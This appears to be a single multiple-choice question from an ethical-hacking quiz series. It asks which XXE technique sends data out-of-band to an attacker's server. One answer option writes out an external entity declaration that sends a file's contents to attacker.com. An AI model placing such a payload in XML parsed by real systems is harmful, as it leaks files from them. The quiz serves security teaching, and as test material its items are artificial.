• Tutorials
  • Courses
  • Tracks

Which XXE payload technique is specifically used to exfiltrate data out-of-band (OOB) to an attacker-controlled server?

Last Updated :
Discuss
Comments

Which XXE payload technique is specifically used to exfiltrate data out-of-band (OOB) to an attacker-controlled server?

Billion Laughs entity expansion to crash the parser.

Supplying <!DOCTYPE to trigger in-memory XML errors.

External entity referencing an HTTP URL: <!ENTITY xxe SYSTEM "http://attacker.com/steal?data=%file;">

Using CDATA sections to hide payloads.

This question is part of this quiz :

Cyber Quiz Day 31
Tags:
Ethical Hacking
Share your thoughts in the comments